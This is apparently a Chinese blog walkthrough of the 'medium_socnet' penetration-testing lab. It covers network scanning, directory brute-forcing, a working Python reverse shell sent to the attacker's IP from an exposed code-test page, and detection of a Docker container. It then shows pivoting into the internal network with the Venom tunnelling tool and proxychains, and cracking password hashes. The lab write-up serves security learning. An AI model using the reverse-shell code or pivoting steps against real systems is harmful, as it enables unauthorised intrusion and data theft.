当前位置: 首页 > article >正文

medium_socnet

0x00前言

靶场要安装在virtualbox (最新版)。否者会出现一些问题。

攻击机:kali2024

靶机:medium_socnet

0x01信息搜集

因为把靶机和虚拟机啊放在了同一网段。

所以我先使用了 arp-scan,查看有多少同一网段ipUP 。

经过推断,发现 192.168.56.103是靶机IP。

接下来就可以对目标进行端口扫描,看看开放了那些端口。对版本服务也进行一个识别。

-p- 全端口扫描

nmap -p- 192.168.56.103

发现目标靶机开发了两个端口 

 经过发现 5000 有httpd,可能是一个网站并且是python语言搭建的。所以前去查看。

 进入发现的确是一个网站。如下图

经过测试发现没有页面没有扫描东西。但是给了一个网站肯定有一些用处。

所以,可以尝试用dirsearch 进行目录扫描。

发现存在admin

 发现这是一个测试代码的界面,所以可以尝试 rce 反弹shell.

0x01反弹shell

因为python搭建的要用python反弹shell.

import socket,os,subprocess
RHOST='192.168.56.105'  
RPORT=4444  
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  # 创建一个TCP-socket对象
s.connect((RHOST,RPORT)) 	# 连接攻击者
os.dup2(s.fileno(),0)		# 复制链接符
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]) 

kali监听端口

执行代码

查看是否成功,如下图即成功。 

0x02怎么判断当前环境为docker 容器。

在查看目录下文件时发现Dockerfile,我们进到的环境可能是docker环境

查看根目录是否有此文件 .dockerenv如果有 90% 是docker环境。

2.cat /proc/1/cgroup

如果文件如图,必是docker

0x03从docker环境到宿主机

发现靶机内网ip 为172.17.0.3 所以先尝试扫描当前网段IP。看看是否有存活的IP。

 for i in $(seq 1 255);do ping -c 1 172.17.0.$i;done

经过发现

存活IP有 .1 .2. 3 .所以我们要对 .1 .2 进行扫描 

 0x04内网穿透

工具

https://github.com/Dliv3/Venom/releases

让在kali直接使用工具扫描内网。需要先把客户端发给靶机  agent_linux_x64

可以在目录下开启一个httpd服务。

靶机获取文件

 

kali先启动服务端

 靶机启动,成功链接

进入节点设置代理端口通过代理端口访问目标主机。

 修改配置文件设置代理端口

扫描

proxychains nmap -Pn -sT  -p9200  -sV 172.17.0.2

 可以在kali上搜索目标框架有没有漏洞。

使用代码。

可能是代码环境问题。我成功反弹shell之后命令一直报错。多次试验结果都一样。所以这篇文章暂时就到这里了。

 查看文件 passwd文件

 

可以先用网上的MD5工具,解开

完整版的请观看下面一位大佬写的文章。 

Medium_socnet渗透测试(含docker容器) - FreeBuf网络安全行业门户 


http://www.kler.cn/a/305032.html

相关文章:

  • DIP switch是什么?
  • JVM 中的完整 GC 流程
  • 成都睿明智科技有限公司解锁抖音电商新玩法
  • 传奇996_21——龙岭事件
  • win11 新建一个批处理,双击查看本机的IP地址
  • Spring高手之路26——全方位掌握事务监听器
  • 数据库与表的操作
  • 2024秋季云曦开学考
  • 商业预测 初识R
  • 数据结构基础详解:哈希表【理论计算篇】开放地址法_线性探测法_拉链法详解
  • 文件管理系统DCC与泛微OA系统集成案例
  • JVM面试真题总结(十)
  • HarmonyOS开发者基础认证试题
  • CSP-J阅读程序专题第二题 - 2
  • 回溯——12.N皇后
  • 源码编译安装python3.12没有ssl模块,python3.12 ModuleNotFoundError: No module named ‘_ssl‘
  • 【H2O2|全栈】关于CSS(2)CSS基础(二)
  • Android 设备的独立环境
  • 在Pycharm中使用GitHub
  • JavaScript 中的异步任务、同步任务、宏任务与微任务
  • Vue3 Day1Day2-Vue3优势ref、reactive函数
  • 基于STM32设计的智能家庭防盗系统(华为云IOT)(224)
  • 速盾:你知道高防 IP 和高防 CDN 的区别吗?
  • 846. 树的重心
  • git-fork操作指南
  • Qt_信号与槽